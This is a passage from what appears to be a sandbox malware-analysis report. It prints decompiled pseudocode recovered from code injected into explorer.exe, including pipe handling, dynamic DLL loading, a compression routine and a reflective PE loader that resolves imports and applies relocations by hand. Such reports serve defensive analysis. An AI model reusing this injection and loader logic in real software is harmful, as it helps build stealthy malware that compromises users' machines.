				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xfe684; // 0x25bf8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000E9187(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E000E9273(_t127);
						E000E85FB( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E000EC3BB(_t127));
				_t98 =  *0xfe68c; // 0x25bfab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E000E9237(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E000E85FB( &_v32, 0);
				return _t128;
			}

0x000eaa04
0x000eaa06
0x000eaa12
0x000eaa17
0x000eaa1a
0x000eaa1c
0x000eaa1f
0x000eaa22
0x000eaa29
0x000eaa2c
0x000eaa33
0x000eaa36
0x000eaa40
0x000eaa41
0x000eaa44
0x000eaa46
0x000eaa47
0x000eaa5e
0x000eabde
0x00000000
0x000eabde
0x000eaa75
0x000eabaa
0x000eabb0
0x000eabbb
0x000eabbd
0x000eabc5
0x000eabc5
0x000eabcc
0x000eabce
0x000eabd7
0x000eabd7
0x00000000
0x000eabda
0x000eaa7b
0x000eaa7e
0x000eaa81
0x000eaa87
0x000eaa91
0x000eaa9b
0x000eaaa2
0x000eaaab
0x000eaaad
0x000eaab3
0x00000000
0x00000000
0x000eaabe
0x000eaac5
0x000eaac6
0x000eaacb
0x000eaacc
0x000eaacd
0x000eaad2
0x000eaad4
0x000eaad5
0x000eaad6
0x000eaad9
0x000eaadf
0x00000000
0x00000000
0x000eaae5
0x000eaaed
0x000eaaf0
0x000eaaf8
0x000eaafb
0x000eaafe
0x000eab04
0x000eab18
0x000eab1e
0x000eab24
0x000eab4d
0x000eab26
0x000eab26
0x000eab28
0x000eab2a
0x000eab32
0x000eab3a
0x000eab3f
0x000eab3f
0x000eab53
0x000eab55
0x000eab55
0x000eab5d
0x000eab65
0x000eab66
0x000eab6b
0x000eab74
0x000eab94
0x000eab94
0x000eab9c
0x000eab9f
0x000eaba7
0x00000000
0x000eaba7
0x000eab7d
0x000eab81
0x00000000
0x00000000
0x000eab89
0x00000000

APIs

memset.MSVCRT ref: 000EAA36
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000EAA5A
CreatePipe.KERNEL32(000E658A,?,0000000C,00000000), ref: 000EAA71

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

Part of subcall function 000E85FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000E8641

Strings

D, xrefs: 000EAA91

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: cda785e1e506e9f46e1628b46d7c982c1d8241f396710abf0ed8d03fc5cbc2e8
Instruction ID: 00f023946bea22e64ac14b87cc00bbd1f26fd6db21acec24ffb583c0408713b7
Opcode Fuzzy Hash: cda785e1e506e9f46e1628b46d7c982c1d8241f396710abf0ed8d03fc5cbc2e8
Instruction Fuzzy Hash: 26512772E00249AFEB51DFA5CC45EEEB7B9AF08300F104169F604F7262DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EC510, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000EC510(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0xfe688; // 0x80000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000E95C2(_t50, 0xb62);
					_t66 =  *0xfe688; // 0x80000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E000E9621( &_v140, 0x40, L"%08x", E000ED442(_t66 + 0xb0, E000EC3BB(_t66 + 0xb0), 0));
					_t20 =  *0xfe688; // 0x80000
					asm("sbb eax, eax");
					_t25 = E000E95C2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0xfe688; // 0x80000
					_t68 = E000E92C6(_t26 + 0x1020);
					_v12 = _t68;
					E000E85B6( &_v8);
					_t32 =  *0xfe688; // 0x80000
					_t34 = E000E92C6(_t32 + 0x122a);
					 *0xfe784 = _t34;
					_t35 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0xfe784);
					 *0xfe77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E000EE1B3(0xfbb40, _t60);
					}
					 *0xfe780 = _t38;
					E000E85FB( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0xfe780 != 0) {
						goto L10;
					} else {
						E000E85FB(0xfe784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0xfe780 == 0) {
						_t46 =  *0xfe6bc; // 0x25bfa18
						 *0xfe780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x000ec510
0x000ec510
0x000ec510
0x000ec513
0x000ec51f
0x000ec52a
0x000ec546
0x000ec54b
0x000ec554
0x000ec556
0x000ec55e
0x000ec57f
0x000ec584
0x000ec591
0x000ec59c
0x000ec5a3
0x000ec5aa
0x000ec5bb
0x000ec5c1
0x000ec5c4
0x000ec5db
0x000ec5e7
0x000ec5ef
0x000ec5f6
0x000ec5fc
0x000ec608
0x000ec60e
0x000ec615
0x000ec628
0x000ec617
0x000ec617
0x000ec61a
0x000ec620
0x000ec625
0x000ec62a
0x000ec635
0x000ec647
0x000ec659
0x00000000
0x000ec65b
0x000ec662
0x00000000
0x000ec668
0x000ec669
0x000ec669
0x000ec670
0x000ec672
0x000ec677
0x000ec677
0x000ec67c
0x000ec680
0x000ec680

APIs

LoadLibraryW.KERNEL32 ref: 000EC608
memset.MSVCRT ref: 000EC647

Strings

dll, xrefs: 000EC5CA
%08x, xrefs: 000EC571

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 01bd365cddb99da47b6cb3ac145527f4d1223840bdad989ae3a94ec4346b47c1
Instruction ID: 5ab6eac19f63b7482b2603e5026ad3fbaf0f5f8e979cc9796bd63c727dc77634
Opcode Fuzzy Hash: 01bd365cddb99da47b6cb3ac145527f4d1223840bdad989ae3a94ec4346b47c1
Instruction Fuzzy Hash: B631E4B2A00288AFF700AB69DC45EBA33ECEB58344F504025F604E75A2EF789A41D711

Uniqueness

Uniqueness Score: -1.00%

Function 000F2DB0, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E000F2DB0(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xec8b55c3
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x23e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E000F5DD0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E000F4B30(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x23e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E000F4C70( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x7e89ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x3c468b3c
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x23e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x7e89ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E000F4C70(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xec8b55c3
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x23e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x23e85000
							E000F5DD0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E000F4B30( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x23e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x000f2db6
0x000f2dbb
0x000f2dbf
0x000f2dc2
0x000f2dc2
0x000f2dc5
0x000f2dca
0x000f2dcf
0x000f2dd2
0x000f2dd7
0x000f2dda
0x000f2de0
0x000f2de0
0x000f2deb
0x000f2dee
0x000f2df5
0x000f2dfa
0x00000000
0x00000000
0x000f2e00
0x000f2e05
0x000f2e05
0x000f2e0a
0x000f2e10
0x000f2e1a
0x000f2e1f
0x000f2e25
0x000f2e44
0x000f2e47
0x000f2e52
0x000f2e52
0x000f2e52
0x000f2e49
0x000f2e49
0x000f2e4b
0x00000000
0x000f2e4d
0x000f2e4d
0x000f2e4d
0x000f2e4b
0x000f2e5a
0x000f2e5f
0x000f2e64
0x000f2e6a
0x000f2e6e
0x000f2e71
0x000f2e74
0x000f2e7a
0x000f2e7f
0x000f2e82
0x000f2e88
0x000f2e8d
0x000f2e93
0x000f2e99
0x000f2e9e
0x000f2ea1
0x000f2ea6
0x000f2eaa
0x000f2eae
0x000f2eb1
0x000f2eb4
0x000f2ebd
0x000f2ec4
0x000f2ec7
0x000f2eca
0x000f2ecf
0x000f2ed4
0x000f2ed7
0x000f2eda
0x000f2eda
0x000f2ede
0x000f2ee7
0x000f2eee
0x000f2ef1
0x000f2ef6
0x000f2efb
0x000f2efb
0x000f2efe
0x000f2f03
0x00000000
0x00000000
0x000f2e27
0x000f2e29
0x000f2e36
0x00000000
0x00000000
0x000f2e36
0x000f2e29
0x00000000
0x000f2e25
0x000f2f09
0x000f2f0e
0x000f2f11
0x000f2f14
0x000f2fbf
0x000f2fbf
0x000f2f1a
0x000f2f1a
0x000f2f1a
0x000f2f1f
0x000f2f49
0x000f2f4c
0x000f2f4c
0x000f2f51
0x000f2f53
0x000f2f55
0x000f2f58
0x000f2f5b
0x000f2f63
0x000f2f68
0x000f2f68
0x000f2f6e
0x000f2f71
0x000f2f74
0x000f2f77
0x000f2f79
0x000f2f79
0x000f2f7a
0x000f2f7a
0x000f2f77
0x000f2f88
0x000f2f8b
0x000f2f8f
0x000f2f94
0x000f2f97
0x000f2f9a
0x000f2f9a
0x000f2f9a
0x000f2f9d
0x000f2f9d
0x000f2fa0
0x000f2fa0
0x000f2f21
0x000f2f21
0x000f2f31
0x000f2f34
0x000f2f39
0x000f2f39
0x000f2f3c
0x000f2f3f
0x000f2f42
0x000f2f44
0x000f2f44
0x000f2fa3
0x000f2fa5
0x000f2fa8
0x000f2fa8
0x000f2fae
0x000f2fb2
0x000f2fb5
0x000f2fb7
0x000f2fb7
0x000f2fc8
0x000f2fca
0x000f2fca
0x000f2fd2
0x000f2fe0
0x000f2fe3
0x000f2fe5
0x000f3005
0x000f3005
0x000f3008
0x000f300e
0x000f300f
0x000f3012
0x000f3014
0x000f3017
0x000f301a
0x000f301d
0x000f3021
0x000f3024
0x000f3027
0x000f302a
0x000f302c
0x000f302c
0x000f302f
0x000f3031
0x000f3031
0x000f3034
0x000f3036
0x000f3039
0x000f3041
0x000f3044
0x000f3049
0x000f3049
0x000f304f
0x000f3052
0x000f3055
0x000f3057
0x000f3057
0x000f3058
0x000f3058
0x000f3063
0x000f3063
0x000f3063
0x000f3066
0x000f3069
0x000f3069
0x000f306c
0x000f306c
0x000f302f
0x000f306f
0x000f3072
0x000f3075
0x000f3077
0x000f307a
0x000f307c
0x000f307f
0x000f3082
0x000f3084
0x000f3087
0x000f308f
0x000f3097
0x000f309a
0x000f309a
0x000f309a
0x000f309d
0x000f309d
0x000f309d
0x000f30a0
0x000f30a6
0x000f30a8
0x000f30a8
0x000f30ae
0x000f30b4
0x000f30bd
0x000f30c4
0x000f30c6
0x000f30c9
0x000f30c9
0x000f30cc
0x000f30cc
0x000f30cf
0x000f30d1
0x000f30d4
0x000f30d6
0x000f30f1
0x000f30f1
0x000f30f5
0x000f30f8
0x000f30fb
0x000f30fe
0x000f3114
0x000f3114
0x000f3114
0x000f3100
0x000f3100
0x000f3102
0x000f3106
0x000f3109
0x00000000
0x000f310b
0x000f310b
0x000f310d
0x00000000
0x000f310f
0x000f310f
0x000f310f
0x000f310d
0x000f3109
0x000f3118
0x000f311b
0x000f3120
0x000f312a
0x000f312a
0x000f312a
0x000f312d
0x000f30d8
0x000f30d8
0x000f30da
0x000f30e1
0x000f30e1
0x000f30e3
0x000f30e5
0x000f30e7
0x000f30eb
0x000f30ed
0x000f30ef
0x00000000
0x00000000
0x000f30ef
0x000f30eb
0x000f30dc
0x000f30dc
0x000f30df
0x00000000
0x00000000
0x000f30df
0x000f30da
0x000f3137
0x000f3139
0x000f3139
0x000f3144
0x000f2fe7
0x000f2fe7
0x000f2fea
0x00000000
0x000f2fec
0x000f2fec
0x000f2fee
0x000f2ff2
0x00000000
0x000f2ff4
0x000f2ff4
0x000f2ff4
0x000f2ff7
0x00000000
0x000f2ffb
0x000f3004
0x000f3004
0x000f2ff7
0x000f2ff2
0x000f2fea
0x000f2fd6
0x000f2fdf
0x000f2fdf

APIs

memcpy.MSVCRT ref: 000F2EBD
memcpy.MSVCRT ref: 000F2F34
memcpy.MSVCRT ref: 000F2F63
memcpy.MSVCRT ref: 000F2F8F
memcpy.MSVCRT ref: 000F3044

Part of subcall function 000F5DD0: memcpy.MSVCRT ref: 000F5EAE

Part of subcall function 000F4B30: memcpy.MSVCRT ref: 000F4B5A

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
Instruction ID: 19bc7fcc98eb251554aaec3d08acc69a921a3b4f309110b566aa12367c1e616d
Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
Instruction Fuzzy Hash: 9AD11471600A089FCB64CF6DC8D4AAAB7F5FF88314B24892DE98AC7B11D771E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 000F2B24, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E000F2B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
